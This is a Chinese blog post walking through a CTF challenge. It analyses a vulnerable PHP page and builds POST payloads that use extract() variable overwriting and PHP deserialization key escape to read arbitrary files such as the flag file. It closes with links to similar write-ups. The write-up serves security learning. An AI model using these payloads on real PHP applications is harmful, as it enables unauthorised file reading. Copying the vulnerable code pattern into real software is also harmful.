BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计

最新推荐文章于 2024-07-25 18:42:49 发布
最新推荐文章于 2024-07-25 18:42:49 发布
阅读量1.7k 收藏 12
点赞数 8
分类专栏: Classical 反序列化/序列化 代码审计 文章标签: php web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/119185112
版权

BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计

知识点

  • 反序列化中的对象逃逸
  • extract()变量覆盖

虽然这题说很easy,但是一点都不easy。我花了好长的时间才能看懂。但是里面的知识点却很有意思,希望我能记下来…
废话不多说,放代码

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}
?>

先分析一下源代码
这段代码是会把php、flag、php5、php4和flig过滤为空字符串。这个过滤很重要,等等我们会用到

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

这里提示我们在phpinfo里可以找到和flag相关的信息

else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!

找到可疑文件:d0g3_f1ag.php
在这里插入图片描述
爆flag

else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
 }

另外,还有明确几个点
1.序列化/反序列化

  • 序列化后的结果是一串字符串。
  • 反序列化会解开序列化的字符串生成相应类型的数据。

在这里插入图片描述
2.序列化/反序列化转换的代码

<?php
$Test['admin'] = "root";
$Test['flag'] = "123456";
$a = serialize($Test);
var_dump($a);
# 输出的序列化为:string 'a:2:{s:5:"admin";s:4:"root";s:4:"flag";s:6:"123456";}' (length=53)

echo "<br/>";
$b = unserialize($a);
var_dump($b);
# 输出的反序列化为:
# array (size=2)
#  'admin' => string 'root' (length=4)
#  'flag' => string '123456' (length=6)
?>

其中的a表示数组,a:2表示该数组里有两个值。而s表示是字符串(其实你敢做这题说明你序列化/反序列化这部分知识还是有的,所以我就不过多解释了。毕竟重点的在后面…)

3.extract()变量覆盖

if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

这里你可以理解为:销毁$_SESSION变量 --》 给$_SESSION变量赋值 --》 extract()变量覆盖
但是,其实段代码是出题人干扰项的。上面的代码和下面的这行代码是等价的。

extract($_POST);

4.extract()变量覆盖代码
在这里插入图片描述

<?php
$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'test';

var_dump($_SESSION);
echo "<br/>";
# extract() 变量覆盖前输出的:
# array (size=2)
#  'user' => string 'guest' (length=5)
#  'function' => string 'test' (length=4)


extract($_POST);
var_dump($_SESSION);
# extract() 变量覆盖后
# array (size=1)
#  'flag' => string 'flag' (length=4)

?>

虽然知道了变量覆盖的原理,但是我们又不能直接给$_SESSION[‘img’]赋值。因为$_SESSION[‘img’]赋值是在extract()变量覆盖的后面执行的

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

这时反序列化中的对象逃逸就派上用场了,同时我们还需要用到出题人的这个过滤函数

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

键值逃逸

  • 因为序列化的字符串是严格的,对应的格式不能错,比如s:4:“name”,那s:4就必须有一个字符串长度是4的否则就往后要。
  • 并且反序列化会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号{}外的就都被扔掉。

示例代码

<?php
header("Content-type:text/html;charset=utf-8");

echo("#正规序列化的字符串");
$a = 'a:2:{s:3:"one";s:1:"1";s:3:"two";s:1:"2";}';
var_dump(unserialize($a));


echo("#带有多余的字符的字符串");
$a_laji = 'a:2:{s:3:"one";s:1:"1";s:3:"two";s:1:"2";};s:3:"three";s:1:"3";';
var_dump(unserialize($a_laji));
?>

示例结果
在这里插入图片描述
这个就是反序列化的逃逸概念,所以现在就需要把$_SESSION[‘img’] 的img属性放到花括号外边去。然后在花括号里面放我们需要的img属性,那么他本来要求的img属性就被咱们替换了。

那具体该怎么构造呢?我们先来看一下大佬的payload:

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

分析一下这个payload
首先我们需要构造img属性:

s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";

其中的ZDBnM19mMWFnLnBocA==是d0g3_f1ag.php的base64加密的结果
然后在这个属性前面随便加上个序列化字符串(只要是合法的就行),比如:

  • ;s:1:“1”;
  • ;s:2:“10”;
  • ;s:3:“100”;

所以payload可以为:

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
_SESSION[phpflag]=;s:2:"10";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
_SESSION[phpflag]=;s:3:"100";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

第二个问题:
为什么在_SESSION[]里面的值是phpflag呢?因为php和flag都是在黑名单过滤函数里面,且总长度刚好为7。

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

所以,这里的phpflag可以换成:

  • phpphp5
  • phpphp4
  • phpfl1g

等等,只要长度正好为7就可以。那为什么一定要长度正好为7呢?继续往下看。。。。

我们先来测试一下大佬的payload是什么效果

<?php
header("Content-type:text/html;charset=utf-8");

echo "添加属性img前";
$_SESSION['phpflag']=';s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
var_dump( serialize($_SESSION));

echo "添加属性img后";
$_SESSION['img'] = base64_encode('guest_img.png');
var_dump(serialize($_SESSION));
?>

上面代码返回结果
在这里插入图片描述
但是,如果添加了黑名单的filter函数把phpflag过滤了会发生什么事?

<?php
header("Content-type:text/html;charset=utf-8");

# echo "添加属性img前";
$_SESSION['phpflag']=';s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
# var_dump( serialize($_SESSION));

# echo "添加属性img后";
$_SESSION['img'] = base64_encode('guest_img.png');
# var_dump(serialize($_SESSION));

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

echo "没有黑名单过滤的反序列化后";
$test = serialize($_SESSION);
var_dump(unserialize($test));

echo "<br/>"; echo "<br/>"; echo "<br/>"; echo "<br/>"; echo "<br/>";

echo "有黑名单过滤的反序列化后";
$test = filter(serialize($_SESSION));
var_dump(unserialize($test));
?>

结果
在这里插入图片描述
问题三:现在可以回答为什么上面的长度为什么要求为7的问题了
字符串:

a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
  1. 经过filter过滤后phpflag就会被替换成空
  2. s:7:“phpflag"就变成了 s:7:”"
    但是这里会出现问题,因为这里要求的字符串的长度为7,但是这里却是空字符串。所以它会向后索取字符串。直到长度正好为7。
  3. 细心的话,可以看到 ";s:48: 这个字符串的长度正好为7

当phpflag被替换成空字符串时,原本的键值对就变成:

  1. 第一个变量的名: s:7:"";s:48:";
  2. 第一个变量的值: s:1:“1”;
  3. 第二个变量的名: s:3:“img”;
  4. 第二个变量的值: s:20:“ZDBnM19mMWFnLnBocA==”;

再加上PHP序列化的严格规定,会把后面多余的字符串丢弃。就变成了:

a:1:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

分析完毕
这就是大佬们payload反序列化逃逸的原理。所以提交payload开始获取flag:

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

提交完这个payload会发现下一步的提示:$flag = 'flag in /d0g3_fllllllag';
在这里插入图片描述
在这里插入图片描述
提示我们flag在/d0g3_fllllllag中(注意/不能漏),所以把/d0g3_fllllllag加密成base64。然后提交payload:

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

在这里插入图片描述

参考来源:https://www.cnblogs.com/h3zh1/p/12732336.html

若丶时光破灭
关注
专栏目录
------已搬运-------BUUCTF:[安洵 2019]easy_serialize_php 1(extract,字符逃逸 session反序列化的另类~.~ )
Zero_Adam的博客
02-06 640
学到的 extract的覆盖数组的操作比如能够覆盖SESSION这个全局数组! 看phpinfo时的注意点 代码审计的能力 字符串逃逸,之前还有一条路可以走,但是后来发现走不通,不过也是个好思路 劝像我一样的rookies。本地自己实验很重要,那些大佬们的payload也是不知实验了多少次才出来的。本地实验的多了,自己也就明白了 源码+我的一些注释 源码多看几遍,找找思路,灵感 <?php $function = @$_GET['f']; function filter($img){ $f
easy_serialize_php-[安洵 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]
qwsn
11-24 1745
0x01、Web 1.easy_serialize_php-[安洵 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF] 第一步:打开题目环境,进入题目链接,代码审计 <?php $function = @$_GET['f']; //GET传参:f function filter($img){ //函数:filter(),使用$img传参 $filter_arr = array('php','flag','php5','ph
BUUCTFphp反序列化
yzl_007的博客
10-23 978
BUUCTFphp反序列化 [极客大挑战 2019]PHP __wakeup()绕过 有备份,盲猜www.zip,下载了网站源码,class.php 引用了flag.php //class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function _
BUUCTF [安洵 2019]easy_serialize_php
最新发布
weixin_73399382的博客
07-25 1052
然而因为filter函数的过滤,将php和flag过滤掉,因为指定的键名长度为10,产生了字符串逃逸,我们在后面随便添加几个垃圾字符让它往后读取形成一个新的键名,形成一个键值对,如下所示是payload过滤加上字符串逃逸后形成的序列化数据。php反序列化的过程中必须严格按照序列化规则才能成功实现反序列化,如果出现这种情况s:10:"flag",键名长度为4,但规定长度为10,就会造成字符串逃逸向后读取,这里是我们解题的关键。s:3:"img";后面代码中先进行序列化操作,原本的序列化数据应该为。
BUUCTF:[安洵 2019]easy_serialize_php
末初的CSDN博客
03-03 985
https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 访问/index.php?f=highlight_file得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
BUUCTF之[网鼎 2020 朱雀组]phpweb ------- 反序列化
weixin_44632787的博客
06-25 748
BUUCTF之[网鼎 2020 朱雀组]phpweb ------- 反序列化 题目 Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and
buuctf-[安洵 2019]easy_serialize_php (小宇特详解)
小宇的web博客
02-24 1928
buuctf-[安洵 2019]easy_serialize_php (小宇特详解) 1.先看题目,出现了一段代码,进行代码审计 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_repla
buuctf-ReadlezPHP(反序列化)
m0_62094846的博客
05-22 390
点开后是源代码,要把前面的view-source:删了 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ ...
[安洵 2019]easy_serialize_php
a1262443306的博客
06-02 323
[安洵 2019]easy_serialize_php 1.打开网页就是源码 <?php $function = @$_GET['f']; function filter($img) { $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } i
[wp][安洵 2019]easy_serialize_php
小飒的博客
07-05 129
[安洵 2019]easy_serialize_php f=phpinfo 得到 d0g3_f1ag.php ZDBnM19mMWFnLnBocA==在get ?f=show_image下 随便赋值 echo一下序列化 需要吞掉这一段 我一开始构造 _SESSION[1] =flagflagflagflagflagphp&_SESSION[function]=";s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;} 发现不行,对比网上别人的payload发现必须function这
[安洵 2019]easy_serialize_php 1
03-16
// 反序列化 $data = unserialize('O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:18;}'); // 修改属性值 $data->age = 20; // 序列化 $serialized = serialize($data); echo $serialized; ?> ``` 最终输出...
BUUCTF】[安洵 2019]easy_serialize_php
aoao331198的博客
05-03 1291
直接看到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION)
BUUCTF之[安洵 2019]easy_serialize_php--WP
weixin_51313108的博客
08-26 522
easy_serialize_php考点Write Up 考点 PHP反序列化的对象逃逸 俩种过滤函数:关键词增加和关键词减少 反序列化对象的逃逸有俩种策略:1.值逃逸 2.键逃逸 键/值逃逸: 因为序列化的字符串是严格的,对应的格式不能错,比如s:4:“name”,那s:4就必须有一个字符串长度是4的否则就往后要。 并且反序列化会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号{}外的就都被扔掉。 Write Up $function = @$_GET['f']; function
php反序列化-BUUCTF刷题记录
cike_y
11-30 922
在前面得知要想获取flag,必须恒等于相对应对象成员的变量,这里也不在解释了。继续分析第二部分,可以看见这部分代码属于传参的判断语句,简单来说,你想要控制第一部分的成员变量的恒等于获得flag,就必须要从最后一个php语句的obj进行接受传参内容,前提是让以上的if条件的判断为真。我们先看第一部分较为关键的代码,可以清楚的看见要想获取flag,就必须要让BUU类对象的成员correct的变量恒等于input成员的变量序列化payload:O:3:“BUU”:2:{s:7:“correct”;
BUUCTF-web [极客大挑战 2019]PHP1 之 反序列化漏洞
yu_jing_hong的博客
12-02 2914
PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼凑还原数据的过程。 二,PHP中的反序列方法 PHP通过string serialize ( mixed $value )和mixed unserialize ( string $str )两个函数实现序列化反序列化序列化serialize()将一个对象转换成一个字符串。反序列化:un.
BUUCTF之[NPUCTF2020]ReadlezPHP------反序列化
weixin_44632787的博客
06-23 1141
BUUCTF之[NPUCTF2020]ReadlezPHP------反序列化 题目 发现无法使用鼠标右键打开源代码,所以可以手动添加**view-source:**来显示页面源代码。 往下拉可以看到可疑的源代码,访问这个链接 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-
网鼎2020php反序列化,[BUUCTF-WEB] [网鼎 2020 青龙组]AreUSerialz
weixin_39846289的博客
04-15 210
SubjectPHP 代码审计 DeserializeMind Palace粗略扫一眼代码,基本确定是反序列化漏洞:function is_valid($s){for($i = 0; $i < strlen($s); $i++)// string: s[i] is between ' ' to '}'if(!(ord($s[$i]) >= 32 && ord($s[$i...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值